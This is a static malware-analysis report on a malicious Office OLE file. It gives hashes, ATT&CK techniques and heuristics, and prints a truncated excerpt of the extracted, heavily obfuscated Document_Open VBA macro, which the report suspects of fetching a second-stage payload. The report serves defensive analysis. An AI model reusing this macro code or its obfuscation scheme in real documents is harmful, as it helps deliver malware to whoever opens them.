Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 451acc0126a86638…

MALICIOUS

Office (OLE)

108.4 KB First seen: 2019-01-20
MD5: ba80b3857725565ba8c4811ca5c68fd0 SHA-1: 6ffd0d8f77fb92d02ebaed4735f5bfe0dfa752f1 SHA-256: 451acc0126a8663867cd5c90103a803fb552bf2dfcc47219844c6a529767a61a
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing a Document_Open VBA macro, which is a common technique for executing malicious code upon opening. The macro code is heavily obfuscated and truncated, making it difficult to determine its exact function, but it is likely designed to download and execute a second-stage payload. The presence of a Document_Open macro and the obfuscated VBA code strongly suggest a malicious intent, likely delivered via spearphishing.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 111,030 bytes but its declared streams total only 36,254 bytes — 74,776 bytes (67%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18395 bytes
SHA-256: ee8125bab15ab2180d9427ddfab0012516ac00d653f187a4d301ac7033170d8b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "WOKSzAjrcOJvkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
   If CWfXmK = Vpcqw Then

Dim OsaZv()
JWaOzH = OCRkm + LdkMXH + BFqCz + XdhBG
tdKOb = iPMvJ + EpOmb + fDRqiE + YOnjwj

End If
   If WGIik <> GhBXE Then

Dim otomto()
iGbHIB = jzzsuz + mRJXE + HXJFZ + fLditM
mQwuz = cwVIi + cFiCc + OpWiLw + hfWbC

End If
   If szBOIE > 6 Then

Dim ssFvmz()
vlBDW = jDwFi + uufQP
sUzPl = WbNZw + JtaEr

End If
   If diGApA > 8 Then

Dim jEJuMb()
mucMjA = hvqJFY + pcpDhV + ilTIOp + RRSNWi
wzrKw = wjQrk + wqbUrf + EIIJE + KIQdX

End If
   If qaqfws <= PpvUcY Then

Dim rppzbi()
dNqon = ozjFtv + lXAwV
wqPNnj = jSTajv + RMMAr + AtSJp + jWATpt

End If
   If laOACH >= MViFY Then

Dim ijZLAF()
zCXFX = AJfzd + FScrzL + jEoYnE + iwmbI
nQjiCI = rHwjWA + TfGsb

End If
arwXTMXIaOE (rUVqV + cwbjM + PbXIs + OiEEiHMCU + SzLiH + LJuvGwKqwa + EWzvnpsuV + UWdFcLtrZXz + NQhYniRcOH + qMsqXJW + lObvwW)
   If BziXh <= FzYSU Then

Dim VSpci()
spLFVs = AwwVa + JZRBUb

End If
End Sub


Attribute VB_Name = "InrzrBVA"
Function rUVqV()
JLiJZvbbppO = "`ja ,S[7[LK,@ [p[b[q" + " [?[F:[;u[ [ [D[Vk[" + " %&5 [i-[P" + "[ [#,[8[ [" + "b[X[^[ [y[C[ [ [!["
If dtvvh < oDNNXN Then

Dim ICwPRi()
bHLFsC = wcMuD + jBEjXL + KFcSUH + QpzUiX

End If
   If VhqCfM <> aATUhN Then

Dim wPrFm()
Wftkka = IfsQf + nfWqV + fUibzA + OJqhdY
zWqoGR = EhuID + fZbcZW

End If
   If ISXRz <> RwoKko Then

Dim vMQEF()
VbzLfh = jUkQM + SSFIND + ltIEij + KCbPu

End If
   If YiKGr >= zrzNXz Then

Dim WwpECB()
zcSscz = pjsUV + stkvB

End If
ZOQmKzmTLz = "ho[ [=[^U[ [d[N" + "[7[ [H[A[_ [7" + "[B[H[ [p[t[*"
wZMrn = "[ [?[e[C[ [$[P[N[" + " [U[<[P[ " + """" + "[" + "QK[ [d[\[+[z4[VB" + "[z[C[)[j[x" + "[E[<[7[e[:[ [ `"
If pRJNC Xor OFPhJf Then

Dim QnOHMI()
TqnGCo = szcRbk + iMwKj + MQzdu + awSfkK

End If
   If wziCKN >= VInPh Then

Dim QmbRzf()
jDsJMN = oaRrG + HWfhuz

End If
   If rDtjK <> 18 Then

Dim wRwOr()
EQphkD = amjSwL + ohOIHz + kfmvWG + FQwuLu
JmvoSw = aHlzXP + RDpHs

End If
   If lDlNw = VWmYkR Then

Dim fvSTp()
wKXBz = rUnMHm + iGXjJ + VMLDUM + FusWl

End If
jbRUrKoFi = "[V[#[-[q[F'K" + "^[R[P[X`[h" + "[FSz[6[I[u[8[" + "j[?d[h[\[:[u[^" + """" + "[-[Z" + "[b[/[Q,o[.["
hvcFASt = "N[x[_`[+[I[8[v[Q[" + "D[L[V[T[pK[A[Q[*o[" + "I[g[E[![b[][r " + "[p6[lj[U'[a[b[7['["
jdzui = "3[q[8[g[P[F[U&[" + "b[*[iA[j[b[:[" + "e[5[h[V[ts"
rUVqV = JLiJZvbbppO + ZOQmKzmTLz + wZMrn + jbRUrKoFi + hvcFASt + jdzui
   If IJNMuJ > qOnfo Then

Dim vGVqzz()
vqvJi = uHtXzL + puivz + DijDE + KJaYMD

End If
End Function
Function cwbjM()
RTpzOcYlGTB = "[l6[u[bs[ " + "[$[:k[Z[G[w[F,[l[" + "7[8[+[U[ &[v[U" + "[6[L?[d%K[3[P[E" + "o[+[U[/[![p[N&" + "[ [ S[J[)[+[H"
If iUSHK = baafd Then

Dim jvGXVA()
zvUPj = FXpVjr + DwDsFP + KCzva + CoTPVG

End If
   If TmIvMX = IEETf Then

Dim dYRqNW()
vFwmiV = HijID + msUilc + uGTVpP + iXlcAz
hOnWQ = DziYvQ + okEmE

End If
   If XCbdK >= ZvZlhD Then

Dim zWaaPM()
njoEB = XaJuP + wDSOW

End If
   If XHOFi >= 12 Then

Dim EBlEu()
pqisOR = tzwwY + kpREaz + rkfro + XACJRs
mJMGb = DAGDb + pQzZn + LEUzFK + DbuFqq

End If
   If vROEi > PDwqp Then

Dim TIAXZ()
iwlLnq = XiTihU + sSudUq + MoamM + HrBaB
NXXRjd = WGcvV + WtbAN

End If
UlzrjuoWwf = "[*[G[c[$[=[^[ [U" + "[F[P[Xj,[!" + "@[T[6%[>[#`[b[?" + "[H[ [i" + """" + "J[ " + "[f[T[1[5[C]" + "[7[#[a[q[-[\^[n[fo"
wOIaCoHiz = "[l[$['[\[i[7@[;" + "k^[ [J[t[ [+[ " + "[l&[c0[AC@[w+" + "[v[g,[G[ds[/[M[e[T" + "[b[T[3[V[Q[![F[6K[x[" + "h[Z[0[v,[vmo[3"
cwbjM = RTpzOcYlGTB + UlzrjuoWwf + wOIaCoHiz
   If lUnLq Or FXijzM Then

Dim MqDWzi()
QtituX = CXiSd + iqamN + PswUp + wzjlG

End If
   If omdwOh Or jsDIEK Then

Dim ihIUl()
ucvZZP = wTzYOJ + scJaCI

End If
End Function
Function PbXIs()
VHGvP = "[p[{[q[/,[z[x" + "[bo[y&r[w[u[I[" + "#[a[x[g[M[6[" +
... (truncated)